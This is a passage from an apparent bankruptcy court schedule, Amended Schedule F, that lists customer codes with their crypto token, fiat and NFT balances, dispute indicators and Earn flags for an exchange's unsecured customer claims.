| 07416112 | | CUSDT[8], ETH[.15260914], ETHW[.15184047], TRX[172.9330986], USD[1169.95] | Yes | |
| 07416114 | | BTC[0], ETH[0], LINK[0], SOL[0], USD[0.42] | | |
| 07416116 | | BRZ[2], CUSDT[9], DOGE[1], ETH[.00000001], USD[0.00] | | |
| 07416119 | | SOL[36.40544], USD[2200.54] | | |
| 07416131 | | USD[0.02] | | |
| 07416134 | | BTC[0.00007155], SOL[.552] | | |
| 07416149 | | ETH[.03130355], ETHW[.03130355], USD[0.00] | | |
| 07416152 | | BTC[0], USD[0.00], USDT[0.00000259] | | |
| 07416153 | | USD[0.67] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07416155 | | CUSDT[1], SOL[10.67695297], TRX[1], USD[0.01] | Yes | |
| 07416156 | | BRZ[5], CUSDT[12], DOGE[1], GRT[4], TRX[6], USD[0.00], USDT[1] | | |
| 07416161 | | BTC[.00509952], ETH[1.01416977], ETHW[1.01416977], SUSHI[31.80014881], USD[0.00] | | |
| 07416162 | | ETH[.00057322], ETHW[0.00057321], MATIC[600], NFT (337907666985474638/StarAtlas Anniversary)[1], NFT (353499202825222312/StarAtlas Anniversary)[1], NFT (383781734921772490/StarAtlas Anniversary)[1], NFT (413001744056250206/StarAtlas Anniversary)[1], NFT (421055531366271788/StarAtlas Anniversary)[1], NFT (431573400991259148/StarAtlas Anniversary)[1], NFT (469983699717820885/0x0000)[1], NFT (495635514290385202/StarAtlas Anniversary)[1], NFT (499265238820852141/StarAtlas Anniversary)[1], SOL[314.842], USD[6.98] | | |
| 07416165 | | USDT[2.2736] | | |
| 07416170 | | BTC[.00085257], CUSDT[4], ETH[.02213903], ETHW[.02213903], TRX[1], USD[0.14] | | |
| 07416175 | | DOGE[1], LINK[.25498123], TRX[246.94221429] | | |
| 07416176 | | CUSDT[1], DOGE[2], GRT[3.0945549], TRX[4], UNI[2.15392759], USD[0.00], USDT[2.15392760] | Yes | |
| 07416182 | | DOGE[.5126], SOL[.093146], SUSHI[.22418], USD[0.00], USDT[16.99915000] | | |
| 07416185 | | ETH[0.00045040], ETHW[0.00045040], USD[22.06], USDT[0] | | |
| 07416187 | | CUSDT[1], USD[0.01] | Yes | |
| 07416192 | | CUSDT[3], USD[0.00] | | |
| 07416200 | | USD[1.00] | | |
| 07416202 | | BTC[.00325702], CUSDT[7], DOGE[4356.37100443], ETH[.02499793], ETHW[.02499793], PAXG[.04898816], SHIB[1], SUSHI[3.77367509], USD[0.00], USDT[1] | | |
| 07416209 | | BRZ[1], CUSDT[3], DOGE[2], NFT (350638856286661697/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #66)[1], NFT (370104068596255762/Brick World #40)[1], NFT (394066572944274718/Marilyn Monroe Set #1)[1], NFT (422385066402728753/Lewandowski)[1], NFT (424484133299917602/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #66)[1], NFT (488825964549915797/CryptoAvatar #169)[1], NFT (532016819233890596/Brick World #43)[1], SHIB[4645702.58303886], USD[0.00], USDT[0] | | |
| 07416213 | | CUSDT[1], DOGE[3708.41263079], USD[0.00] | | |
| 07416218 | | BTC[1.0820229], SOL[1248.87932134], USD[12.85] | | |
| 07416221 | | CUSDT[1], USD[0.00] | | |
| 07416222 | | BAT[1], ETH[0], ETH[0], GRT[0], SHIB[4], USD[0.00], USDT[0.06777115] | Yes | |
| 07416230 | | USD[6.89] | | |
| 07416233 | | BTC[.0065976], ETH[0.78947541], ETHW[0.78947541], MATIC[29.97], SOL[.44976], USD[0.00], USDT[0.00001060] | | |
| 07416236 | | USD[0.00] | | |
| 07416242 | | SOL[503.79665693], USD[0.68] | | |
| 07416246 | | USD[0.00] | | |
| 07416247 | | BTC[.00000001], SHIB[1], USD[0.01], USDT[0.00464573] | Yes | |
| 07416248 | | ETH[0], USD[0.40] | Yes | |
| 07416254 | | USD[0.00] | | |
| 07416257 | | ETH[.01587494], ETHW[.01587494] | | |
| 07416268 | | BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0.00002210] | | |
| 07416269 | | BCH[0], DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07416273 | | ALGO[73.00832151], BAT[136.66700781], BCH[.00003092], BRZ[.22858402], BTC[0.00000034], CUSDT[30.07850673], DOGE[2283.46841186], ETH[0.00000133], ETHW[0.00000133], KSHIB[.00004181], MATIC[0], SHIB[5195958.56948915], TRX[1.0152682], USD[472.36], USDT[0.00000001] | Yes | |
| 07416280 | | TRX[225.096], USDT[.04923338] | | |
| 07416284 | | SOL[0], USD[0.00], USDT[0] | | |
| 07416292 | | DOGE[0], ETH[0], ETHW[0], USD[0.01] | | |
| 07416298 | | CUSDT[3], DOGE[1], KSHIB[9190.48928984], SUSHI[.2224065], TRX[1], USD[0.60], USDT[0] | Yes | |
| 07416305 | | BTC[0.00005852], DOGE[.181], SOL[.00082], USD[0.00], USDT[0.00000001] | | |
| 07416307 | | BTC[0], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07416310 | | BTC[.0000253], ETH[.00052848], ETHW[0.00052848], NFT (476718936147022415/Saudi Arabia Ticket Stub #808)[1], SOL[.5964], USD[12.59] | | |
| 07416317 | | CUSDT[1], USD[493.14], USDT[0] | Yes | |
| 07416323 | | LINK[0], USD[0.88] | | |
| 07416325 | | ETH[.00000348], ETHW[.03565655], SOL[.00368126], USD[0.00] | Yes | |
| 07416328 | | DOGE[1], USD[0.00] | | |
| 07416337 | | DOGE[0], GRT[0], SUSHI[0] | | |
| 07416342 | Contingent, Disputed | USD[0.00], USDT[0] | Yes | |
| 07416348 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07416354 | | CUSDT[1], DOGE[37.87593901], USD[0.00], USDT[0] | | |
| 07416365 | | NFT (408860682511630302/Vintage Sahara #869)[1], NFT (464892722330811495/Vintage Sahara #467)[1] | | |
| 07416370 | | ETH[.000327], ETHW[.00012659], USD[0.01] | | |
| 07416377 | | SOL[6.00000001], USD[0.89] | | |
| 07416380 | | DOGE[1], SUSHI[0] | | |
| 07416381 | | BTC[.00886937], DOGE[2], USD[0.00] | | |
| 07416384 | | USD[0.00] | | |
| 07416396 | | USD[0.29] | | |
| 07416407 | | AVAX[0.04553424], BCH[.00856334], BTC[.00025801], CUSDT[8], DOGE[268.78654402], ETH[.00934833], ETHW[.00923436], LINK[.34860173], LTC[.08395779], SHIB[98021.68518533], SOL[.32581774], TRX[1], USD[0.00], USDT[11.45623744], YFI[.00036669] | Yes | |
| 07416410 | | BRZ[0.00000079], CUSDT[3], SOL[.07246942], SUSHI[.00986952], TRX[1], USD[0.00], USDT[0.00000007] | | |

Amended Schedule F - Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07416411 | | SOL[0] | | |
| 07416412 | | BAT[1.0165555], CUSDT[2], DOGE[0], ETH[.00000001], SHIB[2], SUSHI[1.10286155], TRX[10.1079756], UNI[1.103214], USD[0.00] | Yes | |
| 07416413 | | USD[0.00] | | |
| 07416420 | | CUSDT[1], DOGE[1], ETH[.00008367], ETHW[.07851704], GRT[3.00012725], TRX[1], USD[1.18], USDT[.00000001] | | |
| 07416428 | | BF_POINT[100], DOGE[10817.39003975], NFT (297271458576452098/Lulu Art #002)[1], NFT (341283244185840007/Sparrow#4)[1], NFT (345789536633170572/Monster robo)[1], NFT (349890043032542865/Doge Club #9)[1], NFT (356522187327832181/Skull robo)[1], NFT (390540045041607587/Octo robo)[1], NFT (434248596796415946/DJT #45 1 Of 5 )[1], NFT (443421726618347860/Rare Art #2)[1], NFT (503258738391412156/Angela)[1], NFT (520596566741991752/Sparrow#1)[1], NFT (534103422491511910/Think big )[1], NFT (540611315699346892/Lulu Art #003)[1], NFT (553040538506734758/Iconic robo)[1], SHIB[9025891.48872916], USD[0.00] | Yes | |
| 07416431 | | SOL[.03040684] | | |
| 07416432 | | NFT (542946784304874855/Coachella x FTX Weekend 2 #15710)[1] | | |
| 07416438 | | BAT[348.45473534], BRZ[1], BTC[.07684135], CUSDT[7], DOGE[878.47412462], ETH[.09237503], ETHW[.09237503], GRT[80.07304711], LINK[13.82975201], SOL[31.01251376], SUSHI[12.48125766], TRX[7], USD[0.00], USDT[0] | | |
| 07416445 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07416446 | | DOGE[1], USD[0.01] | | |
| 07416461 | | USD[0.00] | | |
| 07416462 | | BTC[0], SOL[.00000001], USD[0.00] | | |
| 07416476 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07416479 | | NFT (319419961263107408/Humpty Dumpty #1668)[1], NFT (402430723202484048/Entrance Voucher #1476)[1] | | |
| 07416480 | | DOGE[1.03388160], GRT[0], TRX[0.00000081], USD[0.10] | | |
| 07416503 | | DOGE[0], ETH[0], TRX[2], USD[0.00] | Yes | |
| 07416504 | | USD[0.00] | | |
| 07416511 | | BTC[.00634908] | | |
| 07416534 | Contingent, Disputed | USD[0.00] | | |
| 07416535 | | BTC[.00003642], USD[0.00], USDT[0] | | |
| 07416536 | | CUSDT[1], USD[0.30] | | |
| 07416537 | | CUSDT[2], USD[0.01] | | |
| 07416544 | | USD[0.00], USDT[1.479] | | |
| 07416549 | Contingent, Disputed | DOGE[2], USD[0.00], USDT[0.00040443] | | |
| 07416565 | | DOGE[1], ETH[0], GRT[.00998262] | Yes | |
| 07416570 | | USD[0.00] | | |
| 07416572 | | BAT[391.32572917], CUSDT[4], TRX[2], USD[0.00] | | |
| 07416577 | | USD[50.00] | | |
| 07416581 | | USD[0.00] | | |
| 07416589 | | BTC[.0000003], DOGE[1], USD[0.00] | | |
| 07416590 | | BTC[.0100899], SOL[14.5854], USD[9.24], WEST_REALM_EQUITY[0] | | |
| 07416594 | | USD[0.00] | | |
| 07416597 | | BAT[1], BRZ[3], CUSDT[4], TRX[2], USD[0.00] | | |
| 07416601 | | DOGE[1], USD[0.00] | | |
| 07416606 | | USD[1.39] | | |
| 07416608 | | DOGE[1], USD[0.00] | | |
| 07416611 | | FTX_EQUITY[0], USD[0.16], WEST_REALM_EQUITY_OPTIONS_PER_AWARD_AGREEMENTS_PENDING_MAY_2021[0] | | |
| 07416613 | | ETH[0], SOL[24.87], USD[0.36] | | |
| 07416620 | | BTC[0], NFT (294422793215951755/Birthday Cake #2864)[1], NFT (405664427237580157/2974 Floyd Norman - OKC 3-0246)[1], SOL[0], USD[0.00] | | |
| 07416624 | | AVAX[0], BTC[-0.00003705], DOGE[78.50795193], ETH[0.00037671], ETHW[0.00089228], KSHIB[6.9425], LINK[0.15772721], MATIC[0.15689275], SOL[1.76936209], USD[171.10], USDT[0], YFI[0] | | |
| 07416625 | | USD[1.84] | | |
| 07416626 | | ETHW[.15518351], SHIB[2], TRX[1], USD[0.00] | | |
| 07416632 | | BTC[.00006988], ETH[.0008584], ETHW[.0008584], SOL[.01992565], USD[0.88] | | |
| 07416637 | | CUSDT[940.24023146], DOGE[.00039869], ETH[.01296047], ETHW[.01296047], TRX[62.63231907], USD[1.79] | | |
| 07416640 | | SOL[74.7], TRX[51.2720005], USD[0.00] | | |
| 07416641 | | DOGE[1], USD[0.00] | | |
| 07416642 | | CUSDT[12], DOGE[0], ETH[0], ETHW[1.09275431], GRT[729.60657967], LTC[1.46860241], SHIB[3144109.67003805], TRX[5], USD[4.04], YFI[.003716] | Yes | |
| 07416650 | | BTC[0.01911679], ETH[.278343], ETHW[.278343], LINK[2.391], SOL[4.1958], TRX[185.256], USD[0.43] | | |
| 07416652 | | DOGE[233.73503258], SHIB[1493.42230635], USD[0.00] | | |
| 07416660 | | TRX[1], USD[0.00], USDT[39.80016021] | | |
| 07416666 | | AAVE[.03806229], BAT[16.34179233], BCH[.0241981], DOGE[1], GRT[7.30670164], KSHIB[681.06613669], LINK[1.38380367], LTC[.10687789], MATIC[7.33691709], MKR[.00378067], PAXG[.00603577], SHIB[294294.90376692], SOL[.00000771], SUSHI[.62583316], UNI[.34393821], USD[0.00], USDT[2], YFI[.00020146] | | |
| 07416669 | | ETH[0.00000001], SOL[0], SUSHI[.4425], UNI[.0651], USD[0.01], USDT[0] | | |
| 07416670 | | USD[0.00] | | |
| 07416674 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07416676 | | BTC[0], CUSDT[11], USD[0.00] | | |
| 07416684 | | BRZ[1], CUSDT[4], DOGE[260.46637513], SOL[7.49502294], TRX[4066.5718312], USD[227.39] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07416688 | | BAT[1.00703078], DOGE[1.00003078], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], USD[15.00], YFI[0] | | |
| 07416690 | | DOGE[2], TRX[2], USD[0.00] | | |
| 07416692 | | USD[0.00] | | |
| 07416698 | | BTC[.00118118], CUSDT[1], DOGE[3.000548], SHIB[3], SOL[1.00000182], USD[0.00] | Yes | |
| 07416703 | | ETH[0], USD[0.00], USDT[0] | | |
| 07416704 | | SOL[0] | | |
| 07416708 | | USD[0.00] | | |
| 07416709 | | USD[200.00] | | |
| 07416722 | | KSHIB[14821.01524128], USD[0.00], USDT[0] | | |
| 07416724 | | CUSDT[4], TRX[2], USD[0.63] | | |
| 07416730 | | BAT[1.0165555], BRZ[2], CUSDT[16], DOGE[2.29898860], GRT[1.00498957], LINK[5.82260345], TRX[4507.76538758], USD[3086.33] | Yes | |
| 07416737 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07416743 | | BTC[0.02067858], USDT[0.00020267] | | |
| 07416745 | | DAI[0], ETH[.00000001], USD[0.04], USDT[0.00000001] | Yes | |
| 07416748 | | CUSDT[8], DOGE[0], ETH[0.00000013], ETHW[0.00000013], LINK[.00004638], TRX[1], USD[3.90] | Yes | |
| 07416749 | | CUSDT[6], DOGE[332.89571422], USD[0.00] | | |
| 07416750 | | USD[0.91] | | |
| 07416757 | | USD[0.00] | | |
| 07416758 | Contingent, Disputed | ETH[.00050182], ETHW[.00050182], TRX[1], USD[12.02] | | |
| 07416761 | | CUSDT[9], DOGE[2408.59750359], ETH[.0031754], ETHW[.00313436], TRX[154.34991521], USD[4.39] | Yes | |
| 07416767 | Contingent, Disputed | BTC[0.00397740], SOL[2], USD[241.58] | | |
| 07416773 | | BAT[1.01642060], BCH[0], BRZ[2], BTC[0], CUSDT[6], DOGE[2], ETH[0], GRT[4.17441887], LINK[0], MATIC[0], SOL[0.00000002], SUSHI[0.02076246], TRX[5], USD[0.00], USDT[2.17165302] | Yes | |
| 07416783 | | TRX[1], USD[0.96] | Yes | |
| 07416788 | | USD[0.01] | | |
| 07416793 | | DAI[.07748069], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07416800 | | USD[0.00] | | |
| 07416807 | | BAT[6.5300737], USD[0.00] | | |
| 07416813 | | AAVE[.00118104], ETH[.00000001], SOL[0], USD[101.00], USDT[0] | | |
| 07416814 | | USD[4.48] | | |
| 07416820 | | BTC[0], USD[0.00] | | |
| 07416821 | | BRZ[1], DOGE[2], TRX[1], USD[0.01], USDT[0] | | |
| 07416826 | | USD[1.37] | Yes | |
| 07416829 | | CUSDT[4], DOGE[977.47066951], SOL[2.54128082], TRX[437.01610631], USD[0.01] | Yes | |
| 07416833 | | BAT[1], BRZ[1], CUSDT[9], ETH[0.00000336], ETHW[0.00000116], GRT[1.00887544], SHIB[7], TRX[9], USD[0.00], USDT[520.27804437] | Yes | |
| 07416840 | | BTC[.00090867], DOGE[1336.08371709], GRT[1], USD[0.00] | | |
| 07416844 | | CUSDT[5], DOGE[94.50128392], ETH[.00287888], ETHW[.00287888], USD[0.01] | | |
| 07416845 | | BTC[0], USD[0.79], USDT[0.00000021] | | |
| 07416852 | | USD[593.66] | | |
| 07416855 | | CUSDT[3], DOGE[4095.99323054], GRT[13.31494925], LINK[1.14042876], SUSHI[1.64223546], TRX[550.24939158], USD[0.00] | Yes | |
| 07416862 | | TRX[.814], USD[0.18], USDT[1.38846841] | | |
| 07416871 | | SOL[0], USD[0.65], USDT[2.52490000] | | |
| 07416872 | | ETH[.140859], ETHW[.140859], USD[246.62] | | |
| 07416876 | | BTC[0.00000001], ETH[0], ETHW[0], USD[99.02], USDT[0] | | |
| 07416883 | | BTC[.00115633] | | |
| 07416885 | | USD[5.51] | Yes | |
| 07416888 | | BTC[0.00025534], ETH[.00094], ETHW[.00094], USD[0.00] | | |
| 07416896 | | BRZ[1], BTC[.01012508], CUSDT[2], DOGE[9109.50032102], TRX[2], USD[0.00] | Yes | |
| 07416903 | | USD[0.00] | Yes | |
| 07416904 | | AAVE[0], BAT[9.50294631], BRZ[14.86054237], BTC[0.00000017], CUSDT[75.61516511], DOGE[40.64374113], ETH[0.01201019], ETHW[0.01185960], GRT[1], KSHIB[0], LINK[1.04329438], LTC[0], MATIC[0.02060527], MKR[0], NEAR[0], SHIB[7], SOL[0], SUSHI[0], TRX[23.24285438], UNI[0], USD[0.00], USDT[5.27415404], YFI[0] | Yes | |
| 07416907 | | BTC[.00001938], USD[0.65] | | |
| 07416908 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07416918 | | ALGO[60.83802], BTC[0.00505956], ETH[0.00942894], SOL[0], TRX[0], USD[206.26], USDT[0], YFI[0] | | |
| 07416923 | | USD[0.68] | | |
| 07416926 | | BAT[0], BRZ[0], CUSDT[0], DOGE[0], GRT[0.00608648], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07416927 | | BTC[.00041767] | | |
| 07416930 | | BTC[0], USD[1.32], USDT[0.00000001] | | |
| 07416934 | | BTC[0], DOGE[201.793], SHIB[199800], USD[0.18] | | |
| 07416938 | | BRZ[2], CUSDT[3], TRX[1], USD[0.17], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07416940 | | BAT[3.26218852], CUSDT[4], DOGE[4.01071749], SOL[0], TRX[7], USD[0.00], USDT[1.0784401] | Yes | |
| 07416945 | | BRZ[2], CUSDT[11], ETH[.28588825], ETHW[.28568989], SHIB[2], SOL[.40446168], TRX[2], USD[104.48] | Yes | |
| 07416952 | | BAT[1.0165555], BRZ[6.64460099], BTC[.00001432], CUSDT[696.52823777], NFT (522460994892189915/Entrance Voucher #2611)[1], SHIB[769591.42146978], USD[2.60] | Yes | |
| 07416953 | | USD[0.00], USDT[0.00000067] | | |
| 07416958 | | DOGE[656.364], USD[0.07] | | |
| 07416961 | | BRZ[2], BTC[.04230511], CUSDT[3], DOGE[4], ETH[.10906988], ETHW[.10906988], LINK[22.50366324], TRX[1], USD[0.00] | | |
| 07416962 | | CUSDT[1], LINK[6.49489301], USD[0.00] | | |
| 07416965 | | MATIC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07416968 | | BTC[.00063374], DOGE[1], USD[0.00] | | |
| 07416971 | | BTC[.05668234], CUSDT[1], DOGE[1637.00606839], ETH[1.4126675], ETHW[1.4126675], GRT[1], SOL[2.82606389], TRX[3], USD[0.00] | | |
| 07416972 | | BAT[2], BRZ[2], DOGE[1.0001149], GRT[1], LTC[21.85540731], TRX[2], USD[0.00], USDT[1] | | |
| 07416974 | | BTC[.02412508], CUSDT[3161.7305446], DOGE[634.60365944], ETH[.0504122], ETHW[1.08842982], GRT[129.30299155], MATIC[176.66664152], SHIB[1948836.34368777], SOL[2.39369289], TRX[253.62053738], USD[0.00] | Yes | |
| 07416978 | | USD[0.00] | | |
| 07416990 | | DOGE[1], SHIB[1], SOL[.00060112], TRX[1], USD[0.05] | Yes | |
| 07416991 | | AAVE[0], BAT[0], BCH[0], BTC[0], CAD[0.00], DOGE[0], ETH[0], EUR[0.00], GRT[0], LINK[0], LTC[0], MATIC[0.00000001], NFT (492579182965473154/Entrance Voucher #3696)[1], SHIB[0], SOL[0.00000001], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07416994 | | BAT[0], BTC[0], DOGE[1], ETH[0], SOL[0], USD[0.00], USDT[0], YFI[.00000016] | | |
| 07416995 | | USD[4.52] | | |
| 07417005 | | CUSDT[1], DOGE[10879.45942897], TRX[1], USD[0.00] | Yes | |
| 07417008 | | USD[3.14] | | |
| 07417014 | | BRZ[1], CUSDT[2], DOGE[.00067097], USD[0.31] | | |
| 07417020 | | BAT[1.01028537], BF_POINT[200], BRZ[6.22715203], BTC[1.26242864], CUSDT[17], DOGE[224.33877125], ETH[4.20825866], ETHW[3.92128429], MATIC[796.91802527], SHIB[17], SOL[496.32300115], TRX[6], USD[0.01], USDT[1.04450629] | Yes | |
| 07417021 | | BTC[0], DOGE[1.00000219], USD[0.00] | | |
| 07417022 | | CUSDT[2], DOGE[4], GRT[2], TRX[1], USD[0.00] | | |
| 07417027 | | BRZ[1], BTC[.0054013], CUSDT[3], DOGE[2244.50459002], ETH[.1324115], ETHW[.1324115], LINK[5.17271236], TRX[1581.0997931], USD[0.01] | | |
| 07417029 | | CUSDT[4], MATIC[0], USD[0.25] | Yes | |
| 07417031 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07417034 | | BTC[0], ETH[0.00000001], SOL[0], USD[0.00] | | |
| 07417038 | | DOGE[0], USD[9.44] | | |
| 07417042 | | BTC[.00007266], TRX[.000003], USD[3.27], USDT[0.00000001] | | |
| 07417043 | | BTC[0], USD[2.86], USDT[0] | | |
| 07417053 | | CUSDT[0], DOGE[0], ETH[0.00000001], LTC[0], USD[0.00] | Yes | |
| 07417057 | | DOGE[2.00000102], TRX[885.48076133], USD[0.00], USDT[10.68954495] | Yes | |
| 07417061 | | BRZ[1], CUSDT[9], SOL[.00000935], SUSHI[.01393626], TRX[1.00001302], USD[0.00] | | |
| 07417074 | | USD[0.00] | | |
| 07417093 | | AUD[10.00] | | |
| 07417096 | | USD[0.00] | | |
| 07417099 | | USD[0.00] | | |
| 07417106 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07417107 | | USD[0.27] | Yes | |
| 07417108 | | TRX[.000001], USD[0.46], USDT[0.00018155] | | |
| 07417111 | | USD[0.00] | | |
| 07417116 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07417127 | | DOGE[1], ETH[.02767838], ETHW[.02733638], USD[0.00] | Yes | |
| 07417133 | | DOGE[2], USD[0.00], USDT[0] | | |
| 07417136 | | BTC[0], USD[0.00] | | |
| 07417139 | | BRZ[4], CUSDT[14], GRT[1], TRX[7], USD[0.00] | | |
| 07417140 | | USD[0.00] | | |
| 07417141 | | SOL[0], USD[0.00], USDT[0] | Yes | |
| 07417142 | | USD[0.00], USDT[.00014155] | | |
| 07417154 | | USD[0.00] | | |
| 07417156 | | USDT[0] | | |
| 07417159 | | CUSDT[1], DOGE[376.66985279], USD[0.00] | | |
| 07417164 | | USD[0.00], USDT[0] | | |
| 07417165 | | USDT[0] | | |
| 07417166 | | BAT[1.01655201], BRZ[2], CUSDT[2], DOGE[3973.28185878], ETH[1.21563767], ETHW[1.21512707], GRT[1.00498568], KSHIB[3195.50890396], NFT (429993895589621591/#1361)[1], NFT (539105740168491669/Stefanie Murray)[1], SOL[9.81495103], SUSHI[23.64365426], TRX[7242.82816337], USD[106.94], USDT[2.21378118] | Yes | |
| 07417187 | | DOGE[0.00000001], ETH[.00000001], ETHW[0.01498501], GRT[.001], LINK[.00000002], MATIC[.01], USD[1.49] | | |
| 07417189 | | DOGE[1091.32677468], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07417194 | | DOGE[774.528], SOL[.00039], USD[889.95] | | |
| 07417205 | | BAT[1.3126053], BRZ[20.78805943], CUSDT[61.78899742], GRT[1.65400638], TRX[23.03304564], USD[0.01], USDT[0] | Yes | |
| 07417207 | | DOGE[.00083366], USD[0.00] | | |
| 07417210 | | BAT[0], BRZ[1], BTC[0], CUSDT[0], DAI[0], DOGE[1], ETH[0.00000001], ETHW[0], KSHIB[0], LINK[0], NFT [393590307103786846/Bahrain Ticket Stub #201][1], PAXG[0], SHIB[3], TRX[0.00000700], USD[0.00], USDT[0] | Yes | |
| 07417213 | | BTC[0], USD[0.00], USDT[0] | | |
| 07417223 | | BTC[0], USD[0.79], USDT[0] | | |
| 07417228 | | USD[200.12], USDT[0] | Yes | |
| 07417236 | | ETH[0.00179855], ETHW[0.00179855], USD[219.98], USDT[0.00000001] | | |
| 07417238 | | SOL[0.00012384], USD[0.00] | | |
| 07417242 | | USD[0.02] | Yes | |
| 07417243 | | USD[0.01] | | |
| 07417244 | | USDT[0] | | |
| 07417249 | | CUSDT[3], DOGE[1.00018862], ETH[.02049472], ETHW[.02049472], LTC[.28781981], TRX[3], USD[0.01] | | |
| 07417253 | | USD[6.33] | | |
| 07417258 | | DOGE[4257.40285644] | | |
| 07417261 | | USD[2000.00] | | |
| 07417262 | | ETH[0] | Yes | |
| 07417271 | | BTC[0], DOGE[5851.6384], ETH[0], ETHW[1.75222543], SUSHI[22.18913728], USD[0.00], USDT[22.05504236] | | |
| 07417275 | | TRX[1], USD[0.00] | | |
| 07417279 | | USD[0.00] | | |
| 07417280 | | BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0] | | |
| 07417288 | | ETH[1.495], ETHW[1.495] | | |
| 07417293 | | AAVE[5.4048605], BTC[1.33128273], ETHW[11.3145722], NFT [309948392264712120/Entrance Voucher #29428][1], SOL[51.062985], SUSHI[.009325], USD[0.00] | | |
| 07417296 | | USD[4.74] | | |
| 07417298 | | USD[6215.18] | | |
| 07417300 | | BTC[.00762289], DOGE[ 14], ETH[.218576], ETHW[.218576], LTC[.0099958], USD[0.86] | | |
| 07417312 | | BRZ[3], CUSDT[40], DOGE[1], ETHW[.0425386], GRT[1], SHIB[5], TRX[7], USD[306.41], USDT[0] | | |
| 07417313 | | DOGE[1], USD[0.00] | Yes | |
| 07417315 | | CUSDT[6], DOGE[4.02183096], GRT[1.00367791], LINK[3.03366633], SOL[.00000001], TRX[8.00087675], USD[2.10], USDT[1.02543197] | Yes | |
| 07417318 | | USD[0.00], USDT[.08476326] | | |
| 07417319 | | BTC[.0006156] | | |
| 07417327 | | BRZ[1], CUSDT[3], DOGE[.00000993], USD[0.00] | | |
| 07417328 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[17.81701283] | Yes | |
| 07417330 | | USD[13098.77], USDT[0] | Yes | |
| 07417337 | | BRZ[1], CUSDT[2], DOGE[1635.71814489], TRX[6], USD[0.00], USDT[0.00000001] | | |
| 07417343 | | AAVE[.00013579], BF_POINT[1100], BTC[.00293075], GRT[1], LINK[.00125543], NEAR[.00239671], NFT [480383039491911074/Entrance Voucher #4504][1], SHIB[55], SOL[.00009923], SUSHI[.00000001], TRX[1], USD[4941.35], USDT[0] | Yes | |
| 07417346 | | CUSDT[4], DOGE[0], TRX[2], USD[0.00] | | |
| 07417351 | Contingent, Disputed | BF_POINT[200], USD[2.12] | | |
| 07417353 | | DOGE[19701.80445834], SHIB[1463458 1.59364534], USD[0.00] | | |
| 07417354 | | BRZ[1], BTC[.00398623], DOGE[3766.88477094], ETH[.05539072], SOL[2.07379964], USD[0.00] | Yes | |
| 07417356 | | BRZ[1], CUSDT[2], DOGE[4062.09283855], TRX[2], USD[32.03] | | |
| 07417357 | | BTC[0], ETH[.00000001], USD[0.00], USDT[0] | | |
| 07417359 | | DOGE[952.22805455], SHIB[449906.13112242], USD[0.01] | | |
| 07417364 | | USD[0.18] | Yes | |
| 07417371 | | ETH[0], ETHW[3.02910000], SOL[11.25786850], USD[0.70] | | |
| 07417373 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07417374 | | BAT[1], CUSDT[1], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07417377 | | DOGE[1], USD[0.00] | | |
| 07417381 | | CUSDT[518.80461059], DOGE[655.92125946], SHIB[263413.28157493], TRX[60.79294179], USD[0.00] | | |
| 07417384 | | BAT[.00004511], BTC[.0000002], DOGE[1200.00001597], GRT[.00001064], KSHIB[9489.62759537], SHIB[1252893.44541694], SUSHI[.00006941], TRX[1.00058007], USD[0.00] | | |
| 07417386 | | BAT[0], CUSDT[1], GRT[0], TRX[0], UNI[0], USD[0.00] | | |
| 07417387 | | BTC[0.00003025], ETH[.00000001], ETHW[0], LTC[.00999], TRX[0.81549521], USD[1.89], USDT[2.16189016] | | |
| 07417393 | | USD[0.00] | Yes | |
| 07417396 | | CUSDT[2], DOGE[2501.08198593], SHIB[4395267.0825045], USD[0.00], USDT[1] | | |
| 07417398 | | BTC[0], DOGE[0], ETH[0], LINK[0], PAXG[0], UNI[0], USD[0.00], USDT[0], WBTC[0] | | |
